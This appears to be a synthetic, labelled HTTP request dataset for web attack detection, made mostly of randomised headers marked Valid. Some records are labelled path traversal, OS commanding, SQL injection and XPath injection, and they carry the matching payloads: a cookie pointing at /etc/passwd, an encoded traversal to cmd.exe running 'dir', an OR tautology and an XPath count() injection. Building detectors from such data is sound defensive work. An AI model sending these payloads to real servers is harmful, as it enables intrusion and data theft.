ETag: W/"MNe5uuHCWGFg_INZ"
Expect: ocotaoi=r9hl
From: xx0art8v@nico4.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Tue, 22 Aug 06 15:01:07 GMT
If-Match: *
If-None-Match: "XGFYWSb_VvXOLN_nQ"
If-Range: *
Max-Forwards: 92
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: Basic ZTJ1OGVlZjpzZDBodA==
Range: 15-64208,-25827,5343-67434
Referer: http://www.aEhlt.uk/Aiaqa.jsp
TE: trailers,trailers
Trailer: Referer
User-Agent: Y1tZe/0.4
UA-CPU: 68000
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2295x7029
Via: 1.3 www.haalvit.png, 7.6 www.desTtd.js
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 452 187.79.238.59 "essopd" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9420
Start - Id: 5857
class: Valid
PUT /oeeaehEae/hoiWhDEkj/ErlOt/p6eiJ5oINuqlI1TLc/obsJxd5uMPeqEw/sQXb878Njc_D0/gO/ElbnF/vSritcego6t4a.nsf? HTTP/1.1
Content-Length: 76
Content-Language: stgt3h,cg6
Content-Encoding: gzip
Content-Location: /erEu/utdear/mltVjhsa/yeaH/wtit.bin
Content-MD5: RXlJaXRhdWRyeW9jd3V2bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jan 10 07:48:56 GMT
Last-Modified: Sat, 30 Jan 10 07:01:25 UTC
Host: 110.167.193.20
Connection: close
Accept: */*
Accept-Charset: windows-1253, euc-cn, x-mac-icelandic, x-mac-arabic
Accept-Encoding: compress;q=0.0, identity, identity, gzip;q=0.2, gzip
Accept-Language: fw-nEN, 3e-ovrdNnk;q=0.4, irqmde-tnotehhw
Cache-Control: only-if-cached
Client-ip: 1.68.14.125
Cookie: 4aimf=90277;hx2t1vit=eservices9ed1lib;nwyi=4B-Q367;TsnO3s6pea7rtyi=6
Cookie2: $Version="7"
Date: Wed, 28 Mar 07 19:15:01 UTC
ETag: W/"Pi7TIRk8d9RbEJz1"
Expect: 100-continue
From: sePnirh@e4qne.de
If-Modified-Since: Thu, 25 Oct 07 15:55:14 CET
If-Unmodified-Since: Wed, 03 Feb 10 13:01:43 GMT
If-Match: "dntvSU0AMxP0WqjPtCR"
If-None-Match: "_jNPDUsI7tsioT1cL"
If-Range: Sat, 20 Feb 10 12:49:44 CET
Max-Forwards: 6
MIME-Version: 6.3
Pragma: t8iPu=io0eD
Proxy-Authorization: Digest nonce
Authorization: Basic aGh1aDVibjM6aU4zb2Z0aGo=
Range: 362988-,-381
Referer: http://atIiwes.com/nSmytnn/esem/nrrm/mr3x/eeTmrlm.asp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: e9ynhyeih (cssDye4Td; ic4uKWaN; uO6E1ar; rCKBya; a2jxF.)
UA-CPU: x86
UA-Disp: 746,1087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3215x099
Via: egtscu/7.2 71.119.122.85:877, nSBlok/8.0 39.83.229.89
Transfer-Encoding: gzip
Upgrade: denqn/7.4, detea/0.8
Warning: 344 www.tvHas.htm "mrTIomoss3aw5NTeu" 
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 8692230651
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vHWH1kEF=253689&eItize=sjg&FBVa64RT=90416&awnlexmcyie8t=adive&_Kivu89CJ1U=ho

End - Id: 5857
Start - Id: 14484
class: Valid
GET /2lGZk/ePQ6AVf57QW7onma/tvMys-L6FC0/EhergaeA/fXFSEsUM6p-Vx@f/olT/gepSlqrdti3he4own/pl0wJ94q.jpeg?toIlezd=pallellnoii+e&i0hrneoHcfbxS=25253936 HTTP/1.0
Host: 83.24.27.30
Connection: iaolyeeg
Accept: */*;q=0.8
Accept-Charset: us-ascii;q=0.6, x-mac-cyrillic;q=0.2, x-mac-icelandic, x-mac-greek;q=0.3
Accept-Encoding: 
Accept-Language: sire-gi4dbe
Cache-Control: bersp='st4eHfre'
Client-ip: 156.195.173.2
Cookie: q7Ghco=nih;30sm=52416403
Cookie2: $Version="42"
Date: Tue, 20 Sep 05 23:56:36 UTC
ETag: "yawXN0e2@WdtKezk2LF8"
Expect: psI9er=oueiagh;8aeee=8Eihn
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sun, 03 Jan 10 01:33:21 GMT
If-Unmodified-Since: Mon, 20 Jul 09 14:32:29 UTC
If-Match: *
If-None-Match: "K4.UOuTCQWC.@Jn"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.4
Pragma: Ao=o
Proxy-Authorization: Basic c1VoaW5nYm86Zk9hcmQ=
Authorization: Digest username="ismaoi"
Range: 737195-
Referer: /aqmcce.php4
TE: deflate;q=0.2,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (X11; U; Linux i586 8.0; cs-dt; rv:4.0.8) Gecko/95909026
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2304x0310
Via: 8.4 22.191.71.206, 4.6 144.245.23.133, 2.5 200.133.201.60
Transfer-Encoding: oemng
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 474 www.anislbri.html "nTdethnvs" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14484
Start - Id: 6502
class: Valid
POST /edatfdfec/zbSinputA7h85mV33/EUnull/hoiAv/ougrE@NorNIFPJ./nu/arlMpg/UQ3deleteQi/dFmaWgG06FqI/tavc9mAnlaawnoo4i2pV/e5PzoSu@x_Y/NJYvAb.css? HTTP/1.0
Content-Length: 249
Content-Language: iulbbtl7,eaeeakn2
Content-Encoding: gzip
Content-Location: http://Eonr.org/sdhzNese/Pwteph/ledeies/nnytih.asp
Content-MD5: NHplaGV4Y2dyeHl0emplZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 09:32:12 CET
Last-Modified: Fri, 02 Apr 10 23:49:59 GMT
Host: www.attndenem.it
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: A-tlrpbaA;q=0.6, n-cg;q=0.5, ouue-heaepn;q=0.8, 4aL3douu-eEa9Le;q=0.0
Cache-Control: max-age=122
Client-ip: 197.127.12.143
Cookie: zA5h@@_E=execer/hfzji1=cdeleteet;mYCys.=78
Cookie2: $Version="12"
Date: Sun, 23 Jul 06 02:01:46 UTC
ETag: "5ouNJQZfDLTW3-1E"
Expect: 100-continue
From: s4epsqsd@rotiihceen.net
If-Modified-Since: Wed, 09 Dec 09 01:49:54 UTC
If-Unmodified-Since: Sun, 02 Mar 08 15:00:53 UTC
If-Match: *
If-None-Match: "HjEjSj48T3ukwNsxuE3@"
If-Range: Sun, 19 Apr 09 17:23:31 CET
Max-Forwards: 791
MIME-Version: 7.4
Pragma: khrphy=rhnf4t
Proxy-Authorization: NTLM MUhlY2llbnVycnJlYmh0YXRyTWV0cHRvdG9obGh0VHRsdW9vcHR0aGc1Tg==
Authorization: NTLM MnV0bXJ4bklpaXNmSXVkdGRudWVjdG5zY3JhTm90QWFy
Range: -0,37191-913541,986937-
Referer: http://ebvK.fr/ewlor/53ee/eBse59y.mp3
TE: deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Obrc0s/6.9.9.9.6
UA-CPU: x86
UA-Disp: 8394,8208,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9481x739
Via: 2.6 www.lbamm.js, 2.0 139.64.235.154
Transfer-Encoding: gzip
Upgrade: ropcwa/9.2
Warning: 451 151.219.53.5 "ns05" 
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 58041011028
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

otk=aonuta2 locationg&8iY5IYo=a4nn@7eugt03s&ela8qwvteddlrfr=tFNhp7nYys&L@bx06B0K=yi4ei2x&DSRSWYtVJ3Q=oiframe&tNloaa5o=903&.KDJv4eAyWD-=24&toaacreWnreho=85340532&acci1lun=reoyZ&na&hotdotnbthbo=aeeln&nbdnr=syalma9exieeedE&go=hacoeqs&o8cSRSfwcs=rip

End - Id: 6502
Start - Id: 1669
class: Valid
GET /w0eH2dTrOxmlMG5/yc/dOKda@bO/p3LsPK@@Ku9B7m/kJWV4UhttpsWt--txML/n8P_Tt/c59pnte7veeSA0E/txtwfNYE/s87HssimtA2a/locationAi8Un.html?w6en83e=rgeen9pcio&8ie=96Ow7kA&o8uf5vehrebotti=bCk&LGLOTRdrop=1&eGpfgnaetenetld=01275922&0o=8236279&euss2tUsnssei=pesorkrnguyAir&rtirfaclcoehosd=mzUE&4ds2X4where=+titlsphp&oraodstdpayoiae=7366984779&ltanxttsdl=hhozbsnsesln+&sutit8aee=tsI1wc-e66q-&jL5.aZfFA7=access_logfosNvrnh&rglgos=iyj%5Dt HTTP/1.0
Host: www.ado0aBcuet.com
Connection: keep-alive
Accept: audio/*;q=0.5, video/*, text/*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: 7s-9rsi;q=0.8, tLi4efn-s;q=0.1, h-ehvoeem;q=0.3, l2trpems-5itoarn
Cache-Control: no-store
Client-ip: 51.43.38.151
Cookie: ut0u= ct<7nxas;iEtoaoteFt=fyudksaee;uiozwa=71546109;cirewi=sn?Jsso;Agh9s=yrro;obyetusanatnd=sZWExVxu8b
Cookie2: $Version="708"
Date: Wed, 27 Jan 10 17:15:54 UTC
ETag: "eug.yMv.VmVToN2ACc"
Expect: 100-continue
From: pb3eit@susdyhwa7.com
If-Modified-Since: Mon, 07 Jan 08 20:20:56 GMT
If-Unmodified-Since: Wed, 25 Nov 09 17:32:37 UTC
If-Match: *
If-None-Match: "oEwIr91cT2@a_Uk-"
If-Range: Fri, 24 Mar 06 01:03:08 CET
Max-Forwards: 8
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: iblojg cls8epe=baessa
Range: 73-
Referer: http://t9iomast.uk/tbjnth1k/oc1uip/p9VddOn/y3n8.js
TE: gzip;q=0.2,chunked;q=0.7,trailers
Trailer: Via
User-Agent: Mozilla/5.2 (X11; U; Linux i386 9.1; nn-o3; rv:9.5.8) Gecko/18066507
UA-CPU: x86
UA-Disp: 6991,2124,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3512x868
Via: FTP/9.5 www.ayeloa.tiff, din6Tb/2.9 www.ilotosle.png
Transfer-Encoding: ifSt; oifr=eEelSpft
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 918 www.oDrh8eht.gif:495 "6reee4ateqt1g" "Tue, 13 Dec 05 16:36:28 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1669
Start - Id: 18668
class: Valid
GET /iteoaiuleo2Ofbtnett/oxQwX5p/eeZqwe6hnhe5ton/enfqqo/dnIo/spEkHx/utir0sN/bTE/A-.qlZ34SOHS.htm?IKdeleteEDvhz_Tf=1097007&neta=oWbjsit1&loaaok=eI-LiJPxDj4m&9n9uSsratei1ynt=t&bxsaerradddc=azra2 HTTP/1.1
Host: www.7rekdf9.com
Connection: keep-alive
Accept: application/rtf;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 255.87.232.0
Cookie: koosedIhnw=79;norxps=r2vndtepiu;e2i7ba=8483;EttR=ms$era&au
Cookie2: $Version="259"
Date: Sat, 17 Nov 07 13:41:24 CET
ETag: "mUVmdJE@P__ohnjE95"
Expect: ueei=ad5I;eoMoe=4ohhpe
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Mon, 22 Feb 10 06:16:37 GMT
If-Unmodified-Since: Mon, 05 Dec 05 09:42:29 UTC
If-Match: "cjBTDVOKqbmedR4ylk"
If-None-Match: "2SyR7dtF9ul91HK2MqWa"
If-Range: Sun, 29 Mar 09 24:20:47 GMT
Max-Forwards: 0926
MIME-Version: 1.3
Pragma: amngus=nrf
Proxy-Authorization: NTLM dWxyZVNlZWl0bWRtMWdhbmJ0aTZvbnplQXRlanJ0ZTVy
Authorization: NTLM SEkzYWVjT2Fnc2VtbGh3aGNoM25pYXBTb2VzaGZTcmVkeA==
Range: -65,607666-2498,-1
Referer: /eulen/e8lr/oaayineN.cfm
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 7.7; ot-dc; rv:6.5.4) Gecko/88857726
UA-CPU: MIPS
UA-Disp: 5413,9937,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8595x9488
Via: 3.0 www.woefah.html
Transfer-Encoding: compress
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18668
Start - Id: 7506
class: Valid
PUT /u8oE/gnt/En9ref6cnhksRnrc/eu/syneuae/m2jcM0/eUubauhtmpoQVq/6Nalfco2hmo/csel/ooBmQkKTHEpJVyaL8c/wb3@fAePQpNlpAYelK/efwTsGAcKQB.css? HTTP/1.0
Content-Length: 25
Content-Language: eAhsi40
Content-Encoding: gzip
Content-Location: /t28nRshf.rar
Content-MD5: czZldG5oNnRhdEZkNXR2ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 08:49:25 UTC
Last-Modified: Tue, 18 Jul 06 12:14:12 GMT
Host: www.etkz.cz:8278
Connection: rBlnes
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 164.123.4.204
Cookie: wl3be=bsa8
Cookie2: $Version="32"
Date: Thu, 22 May 08 02:02:18 CET
ETag: W/"5mVNCS.B9OlPiMZIhNQT"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Tue, 05 Oct 04 13:39:22 GMT
If-Unmodified-Since: Sat, 27 Dec 08 18:19:12 CET
If-Match: *
If-None-Match: "Q2OXbyL97stzc5euV"
If-Range: Sun, 16 May 04 02:22:08 UTC
Max-Forwards: 07
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ae0bFDd6
Authorization: Basic cjJ0ZUVjajphZWVvYXRv
Range: -8172
Referer: /cmasttta/nsspEsn/iusl7u3n/thtit1/mmoahS.mpeg
TE: chunked;q=0.2
Trailer: Expect
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 7.6; ou-Ua; rv:7.4.4) Gecko/88344166
UA-CPU: MIPS
UA-Disp: 4017,6215,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 065x199
Via: 7.3 www.gatca.jpg, 9.5 43.156.0.170, dteah/5.4 www.7akhum.tiff
Transfer-Encoding: gzip
Upgrade: re0dg/7.1
Warning: 710 www.0nr9ps.tiff "rhdtOmautr8t" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 0836554
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

Vu12YOA1Bw=1iic&ret8Meo=7

End - Id: 7506
Start - Id: 36377
class: PathTransversal
POST /enlits4se/tfetnds7h.html? HTTP/1.1
Content-Length: 221
Content-Language: recT,we
Content-Encoding: deflate
Content-MD5: cnM5bGlkZW9ycHVwdDdldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Aug 05 05:20:07 CET
Last-Modified: Wed, 25 Feb 09 05:40:35 UTC
Host: 125.96.165.12:9531
Connection: nstxn
Accept: */*;q=0.0
Accept-Charset: x-mac-korean, x-mac-japanese;q=0.4, windows-1258;q=0.9, x-mac-turkish, x-mac-korean;q=0.3
Accept-Encoding: 
Accept-Language: ttEbneer-Sgruge2a;q=0.0, l8ebeto-cluewNq, t-bf;q=0.4
Cache-Control: max-stale
Client-ip: 62.10.54.23
Cookie: CQ06j2mi=/etc/passwd
Cookie2: $Version="797"
Date: Wed, 15 Sep 04 23:38:40 GMT
ETag: W/"3ezG4sOPFBYDMC-gQ"
Expect: 100-continue
If-Modified-Since: Fri, 01 Sep 06 03:01:30 CET
If-Unmodified-Since: Tue, 02 Feb 10 10:51:12 GMT
If-Match: "xagau0ycDkSf.sEDq"
MIME-Version: 5.0
Pragma: iocc=wonnefs
Proxy-Authorization: nsr7te st6s=sqocjhyd
Authorization: Basic dmU4Mjp1aWVlZEVoWQ==
Referer: http://www.rhEx.de/lev5/hoIatw/nDns/lnn7e/se3oieiV.asmx
TE: trailers
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 2.5; ut-t8; rv:5.2.5) Gecko/35158077
UA-Disp: 884,0581,32
UA-Pixels: 207x8219
Via: 5.6 www.wAcev.js, 6.0 200.103.16.215:97854
Upgrade: y36uv/9.8, o1m/3.5, aelep/3.3
~~~~~: ~~~~~~~~~~~~~~~~~~~~

8QKlyPSn=292&rItlunieesal8i=teop&@KjX=lmetaf&odrat=elesgNtewegjeqoWri&Nmhttpse5vrcp=aua&ee9te=7qu2stnaih&Cn4ice6leknfd=975&szhttpsegroup byePAv=9&n84mnecnaplns1n=7EV1FvkQ&akTgatosrh=6q&4t3nuq2nTl=3YyU8OC.mi&eeeabinyts6=47

End - Id: 36377
Start - Id: 43934
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.inaaat.com
Connection: rdnepi
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip;q=0.2, compress, compress
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 234.178.200.227
Cookie: rkauwhsd=9449;havingNhavingt7TI3Blink_T=ueX-@Nvd1;PE55@_VrH=maam0hsojgawrs;unIo7hm5=eeehwhhHmso;Fprst=a%9;tjuiEopaHicngnr=s657IzisJ
Cookie2: $Version="78"
Date: Sun, 14 Sep 08 23:33:12 UTC
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 100-continue
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Mon, 16 Nov 09 09:40:27 UTC
If-Unmodified-Since: Fri, 02 Oct 09 22:09:59 GMT
If-Match: "@ttS3Ol8Y1fYbYq0ON"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 618
MIME-Version: 3.4
Pragma: l=t
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: /nzeltrr/zebtbh/cer2/Cimt2l/e2azsmro.dll
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (compatible; AudaeliOw; Unix; eke7)
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 8.1 www.ROtu.gif
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43934
Start - Id: 42269
class: SqlInjection
GET /nloLni0ytb.aspx?ajig0g=relabodyefrom%7Csaygwinnt&u4zi=%27+OR+++%27Reoew5w%27++++%3D+N%27+&ez66auel2=rxta&nnO=5916&m1KLAWAx.-=snan&czKih58asmeB=abt&dhYIX5=n&tfnTho8iio=639&tettrrdsLwaegdi=60021474&aesjrRdsnc=copyedCliuwgreco HTTP/1.0
Host: 189.159.140.181
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 8osla-htub4;q=0.9, eNsYet-ef, oit8oTd-r0ahal;q=0.3, j9s-tcl;q=0.3
Cache-Control: max-stale=7
Client-ip: 241.101.146.87
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="64"
Date: Thu, 25 Nov 04 13:37:06 GMT
ETag: "cQI1KzijYNcy.dQfk"
Expect: u69omi=hocA
From: eethwr@T5iivnsieh.be
If-Modified-Since: Fri, 09 Apr 10 16:38:08 UTC
If-Unmodified-Since: Mon, 12 Jul 04 13:53:34 GMT
If-Match: *
If-None-Match: "il1.@MkBFhkiWavrJE"
If-Range: Sat, 20 Feb 10 10:26:49 UTC
Max-Forwards: 8269
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic bGRoTGVncjpvamlu
Range: 996351-59792
Referer: http://www.w03rtl.st/rrernfFn.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/0.2 (compatible; Konqueror/1.5; Win98; ltde)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0775x379
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42269
Start - Id: 26275
class: Valid
GET /GRbaI/aagtmAtthyzr/odhasmtinddh/yahtaccesnyUsock_streampHwget/erithl/gtwud8aa3oh0f9p3hseO/oEYj5jtiVcXl7Qv8A/tEIz9Cq@/iM6dyeoprrsa3azsjat/eaneEt.css? HTTP/1.0
Host: 111.164.108.41:80
Connection: exmoi
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.214.236.182
Cookie: lyoeeg=awNAaoaoinoeec;t3=+;nYnablfh=n8e;Ea34lhe=v_g0EbUj93tD
Cookie2: $Version="448"
Date: Sat, 20 Mar 10 13:55:14 UTC
ETag: "wVO5U.11JOdCxcIz4TQp"
Expect: 100-continue
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Sun, 13 Dec 09 05:24:33 UTC
If-Unmodified-Since: Fri, 03 Oct 08 02:56:42 UTC
If-Match: "VNILo3XkSceZOshqW"
If-None-Match: "RVECa@epsq_cr_Slw-"
If-Range: "QNM7.lV.D1eHng1Eqx"
Max-Forwards: 566
MIME-Version: 9.2
Pragma: 8E21rr=hsd
Proxy-Authorization: Basic ZTVvZTlrYjprYXR3Mg==
Authorization: masep 1urkma=H6igaUbl
Range: 25-4659,99-087,512252-95816
Referer: http://tsz9.ch/iecge/3aif/lozm.png
TE: chunked;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/7.3 (Windows; U; WinNT 4.0; 15-eN; rv:0.5.9) Gecko/67870118
UA-CPU: 68000
UA-Disp: 509,4481,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4730x760
Via: 8.8 www.eltl4n62.jpeg, 8.1 www.rsa1a.gif:282, 6.5 www.reoai.htm
Transfer-Encoding: deflate
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 93545623104
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26275
Start - Id: 22225
class: Valid
GET /QAXG/nlr8nhm8senetwi1/h4NAYQtqLpasswd/owGyf9tc1dcQJL/fPsyYiN/rhPABMahpAtp/mstmautghdedn/lnleiiRoitrdsayStc/cp3xn1RtSDm/ohocTob/eIrJYVu0hcb@aFfp3/eEVsa0dTlXoPZ1k.tiff?etaxtmitaitdrgb=etclitrs+eAr&nhHpec4O=Ceir5cutxtl-ie&nmSioy8rtpSau=8&3rkho71afaftpnP=856759&ew7ostinnchr=11139639 HTTP/1.1
Host: 91.176.40.217
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: us-ascii, x-mac-korean, x-mac-arabic, x-mac-ce;q=0.1, euc-tw;q=0.0
Accept-Encoding: 
Accept-Language: jd9yt-nadu7rw, tOm-e;q=0.0, kd-ia6u, de-Wtn;q=0.9
Cache-Control: max-stale=901
Client-ip: 173.2.133.230
Cookie: X-ftpN23=snttItd;AXoY=n6tteoBn;usdzrnba3timee=qo+y;tr4hq=e;Xi
Cookie2: $Version="14"
Date: Thu, 03 Apr 08 15:51:38 CET
ETag: "8_cZba7QO@gqptQiG9E"
Expect: 100-continue
From: EczsehBn@a2tvcp2i.gov
If-Modified-Since: Tue, 03 Aug 04 17:36:31 GMT
If-Unmodified-Since: Sun, 02 Sep 07 03:43:21 UTC
If-Match: "XqBBWv-D75@hu1atR"
If-None-Match: "1tdfU1uTKqLmFRRvKuL"
If-Range: Mon, 20 Sep 04 15:16:17 CET
Max-Forwards: 06
MIME-Version: 1.4
Pragma: pkiiduml=d
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: NTLM aEhkUmVlbG5pajhzbW0wYXNlNWhEa2Vpb2VlZXM0Y0thaXQ=
Range: -09
Referer: /eszl/Lc6d/io4xu.swf
TE: trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/0.7 (X11; U; Open BSD i586 7.8; 9t-mt; rv:6.4.4) Gecko/69076398
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9834x5645
Via: 7.2 239.166.26.59:210, HTTP/2.6 www.iEets.tiff, HTTP/7.4 www.gaiyh1.tiff
Transfer-Encoding: gzip
Upgrade: Mt2enn/1.0
Warning: 706 www.iiOa5uY.htm "dlo7est8pohpffoz" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 499244
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22225
Start - Id: 48585
class: XPathInjection
POST /.2/Letc/2v/ejraraneawhriao.htm? HTTP/1.1
Content-Length: 573
Content-Language: iM,u8dd
Content-Encoding: identity
Content-Location: /oMtessr/potf/exeau/tBenai.php3
Content-MD5: NnJsZUxDbHlpYU5tME9pZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 04 08:53:35 CET
Last-Modified: Sun, 10 Feb 08 22:43:20 GMT
Host: 129.172.198.35
Connection: keep-alive
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: grzi=ahnna
Client-ip: 58.151.109.14
Cookie: 5Vz-SR@=cthaaira9Ra;tu=3387;m0tAtqaazd=54731257;0nn31=re]eiair1
Cookie2: $Version="380"
Date: Mon, 28 Sep 09 07:32:03 UTC
ETag: "MWE5oEjWnXxdkX5Li_"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Wed, 26 Apr 06 08:51:00 CET
If-Unmodified-Since: Wed, 03 Mar 04 18:50:29 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Tue, 21 Jul 09 23:39:00 UTC
Max-Forwards: 423
MIME-Version: 2.8
Pragma: zsoao='l2b'
Proxy-Authorization: dlghi ebtehms=idn6ijs
Authorization: Basic N2V6cjphZXVxaWk3
Range: -1323,34626-534824
Referer: http://Arnh.fr/Uqnh/situaSu/eyto54/otyck.txt
TE: trailers,trailers
Trailer: Pragma
User-Agent: cba4c3edoeneEttmU
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 1.9 www.ierale.css
Transfer-Encoding: ctoo
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lfeSe=cmails0ireq&aausshs6las=@i7sw&et6urmp=63817326&smec7hnm2tlEt=oa4jlcer8xtutdcte&mqnedfqediaqd=ptrDFZMTF&ohewled=ebsnex;hea|aa&eak23tid=078901&aiieieyti8=jcroumieISCHteeeh&rvnony=753645880&tl3letHrtwre4rn=uhTivoqo9obaotet&Nhnh5Gl4tygn=tihy&m3ntgs9sllftam=aus'     or     count( path/child::node()[position()=((  i   + j   +    k   +  l   +   1)]    |     path/child::*()[position()=(k+1)])=1 or     '3s' =    '  ot31'   or&6i4hFD=57&wevim=56&UfXEynA=allOeui|'union 2abetweentmpye

End - Id: 48585
Start - Id: 21628
class: Valid
